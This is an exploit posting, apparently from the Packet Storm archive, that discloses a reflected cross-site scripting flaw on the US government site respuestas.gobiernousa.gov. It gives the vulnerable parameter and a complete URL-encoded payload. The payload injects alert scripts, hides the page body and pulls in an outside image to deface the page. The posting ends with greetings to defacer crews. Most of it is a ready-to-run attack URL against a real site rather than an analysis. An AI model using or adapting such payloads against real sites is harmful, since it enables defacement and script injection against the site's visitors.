Respuestas.gobiernousa.gov suffers from a cross site scripting vulnerability.
f42828a9279e0c5222892bf174040164c71c785c461fa19bc4f8b2402468f557
# Exploit Title: Respuestas.gobiernousa.gov Cross Site Scripting
# Google Dork: -
# Date: 26/3/2012 3:15 AM (Malaysia)
# Author: Ryuzaki Lawlet
# Blog: http://justryuz.blogspot.com
# Tested on: Linux (OSHIRIX)
# CVE : XSS
######Vulnerable########
Vulnerable : http://respuestas.gobiernousa.gov/system/selfservice.controller?CONFIGURATION=1001&PARTITION_ID=1&CMD=VIEW_ARTICLE&ARTICLE_ID=
######Live Preview########
Sites:
http://respuestas.gobiernousa.gov/system/selfservice.controller?CONFIGURATION=1001&PARTITION_ID=1&CMD=VIEW_ARTICLE&ARTICLE_ID=%20wo.0t??%20by%20Ryuzaki%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
0%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22wo.0t??%20by%20Ryuzaki%22%29%3C/script%3E%3Cscript%3Ealert%28%22http://justryuz.blogspot.com%22%29%3C/script%3E%3Cscript%3Ealert%28%22Cyb3rSec%20Crew%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28https://fbcdn-profile-a.akamaihd.net/hprofile-ak-snc4/277062_207390472645570_423082005_n.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%0B%0Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3C/div%3E&USERTYPE=1#185
######Preview########
Screen shot
http://4.bp.blogspot.com/-pwDwyG0SjYI/T29ztRSjbSI/AAAAAAAAAlM/C8Hna-Z2Hh0/s1600/xssb.png
######Credit########
Antuwebhunt3r| Md Lothdh | Ben CyberSEC | Misa CyberSEC | Sbkiller CyberSEC | Xay CyberSEC | Kejung$ CyberSEC | Biang Rusuh | Afnum vvip | HambaMalam | shah RC | Cak vvip | Lod vvip | Fakyu Tuyu | Alex John NEC | Dark Angel NEC | Cyg Selalu | chliz Aceh | Breackerz Code | Dboyz vvip | AgoenkJR | Misz Nadea | Lone Ranger vvip | Nick Keluang Johor | bl4ckm4gicx NEC | Pak Kordi NEC | b0ogle | Ana dira | pamy | cik din | Jack RC | Thaqif CyberSEC | Hayate DevilSec | KiSSierra | Mike | Syakiller | Hidden Pain | Gilang | MagmaCode RC | MASOKISME and all member | Mambang Oshirix Team | CyberSEC | RileksCrew | Newbie3vilc063s | h3x4 Crew | T3D Hackers | Cyber 4rmy | Indonesia Defacer | Turki Defacer | Pakistan Defacer & Gaza Defacer
Source: http://justryuz.blogspot.com/2012/03/wo0t-respuestasgobiernousagov-cross.html
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed